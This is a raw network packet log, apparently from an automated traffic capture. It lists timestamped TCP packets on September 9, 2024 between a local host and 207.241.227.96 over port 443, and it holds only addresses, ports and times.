Sep 9, 2024 17:34:40.193692923 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193929911 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.197133064 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.197190046 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.197206974 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.197210073 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.197230101 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.197261095 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.197341919 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.235615969 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.235649109 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.235676050 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.235682964 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.235702038 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.235878944 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.256969929 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.257004976 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.257036924 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.257061005 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.257076979 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.257404089 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.257428885 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.257450104 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.257453918 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.257477999 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.269292116 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.278676033 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.278702021 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.278738976 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.278744936 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.278755903 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.279102087 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.279124975 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.279145002 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.279150009 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.279166937 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.279181004 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.279582024 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.279601097 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.279624939 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.279629946 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.279642105 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.280096054 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.280119896 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.280139923 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.280143976 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.280163050 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.280390024 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.280409098 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.280436039 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.280440092 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.280456066 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.323832989 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.323869944 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.323887110 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.323915005 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.323930979 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.324641943 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.343584061 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.343611956 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.343708038 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.343713999 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.343739033 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.343971968 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.344000101 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.344024897 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.344031096 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.344052076 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.365560055 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.365583897 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366074085 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366105080 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.366115093 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366134882 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366137981 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.366436005 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366458893 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366462946 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.366470098 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.366518974 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.366518974 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.367002964 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.367029905 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.367100954 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.367100954 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.367108107 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.367432117 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.367455006 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.367479086 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.367486954 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.367507935 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.388336897 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.409794092 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.409821987 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.409904003 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.409904003 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.409929991 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.413002014 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.430488110 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.430519104 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.430619001 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.430619001 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.430629969 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.430896997 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.430939913 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.431070089 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.431070089 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.431077957 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.431108952 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.452274084 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.452302933 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.452383041 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.452383041 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.452402115 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.452704906 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.452735901 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.452765942 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.452774048 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.452802896 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.453052998 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.453079939 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.453114033 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.453120947 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.453147888 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.453671932 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.453702927 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.453738928 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.453744888 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.453773022 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.454061985 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.454087019 CEST  443  49170  207.241.227.96  192.168.2.22
                                        Sep 9, 2024 17:34:40.454118967 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.454124928 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.454150915 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.469475985 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.496639013 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.496684074 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.496726036 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.496752024 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.496788979 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.498614073 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.517414093 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.517453909 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.517575026 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.517575026 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.517599106 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.517800093 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.517832994 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.517854929 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.517863035 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.517890930 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.517951965 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.539458990 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.539494991 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.539526939 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.539537907 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.539551973 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.539551973 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.539880991 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.539912939 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.539942026 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.539948940 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.539978027 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.540541887 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.540570974 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.540599108 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.540606022 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.540633917 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.541002035 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.541033983 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.541079998 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.541085958 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.541114092 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.541534901 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.541563034 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.541593075 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.541599035 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.541627884 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.583501101 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.583549023 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.583585978 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.583615065 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.583635092 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.604120016 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.604165077 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.604197025 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.604221106 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.604245901 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.604362011 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.604393959 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.604419947 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.604427099 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.604449034 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.625968933 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626009941 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626040936 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.626066923 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626082897 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.626367092 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626399994 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626427889 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.626436949 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626460075 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.626938105 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.626976013 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627001047 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627008915 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627028942 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627413988 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627445936 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627469063 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627480030 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627499104 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627547026 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627691031 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627717018 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627743006 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627748966 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.627768040 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.627875090 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.670212984 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.670259953 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.670295000 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.670320988 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.670336008 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.691415071 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.691457033 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.691533089 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.691533089 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.691549063 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.691658020 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.691690922 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.691716909 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.691724062 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.691745996 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.697524071 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.712850094 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.712892056 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.712915897 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.712922096 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.712943077 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.713241100 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.713277102 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.713299990 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.713305950 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.713344097 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.713619947 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.713645935 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.713670015 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.713675976 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.713697910 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.714140892 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.714173079 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.714198112 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.714204073 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.714226007 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.714462042 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.714488029 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.714510918 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.714515924 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.714538097 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.758790016 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.758841038 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.758898020 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.758898020 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.758908033 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.759109974 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.778400898 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.778443098 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.778491020 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.778496027 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.778520107 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.778614998 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.778769970 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.778808117 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.778830051 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.778835058 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.778856039 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.778903961 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.799734116 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.799777985 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.799830914 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.799830914 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.799856901 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.799952030 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.800112963 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.800142050 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.800167084 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.800173044 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.800195932 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.800225973 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.800515890 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.800546885 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.800571918 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.800576925 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.800599098 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.800622940 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.801012039 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.801039934 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.801070929 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.801076889 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.801098108 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.801242113 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.801506042 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.801536083 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.801561117 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.801567078 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.801589012 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.801641941 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.845493078 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.845532894 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.845681906 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.845681906 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.845681906 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.845710993 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.864975929 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.865020990 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.865057945 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.865087032 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.865104914 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.865119934 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.865559101 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.865590096 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.865622044 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.865632057 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.865664005 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.865717888 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.886854887 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.886895895 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.886925936 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.886951923 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.886970043 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.886977911 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.887110949 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.887145042 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.887167931 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.887176037 CEST44349170207.241.227.96192.168.2.22
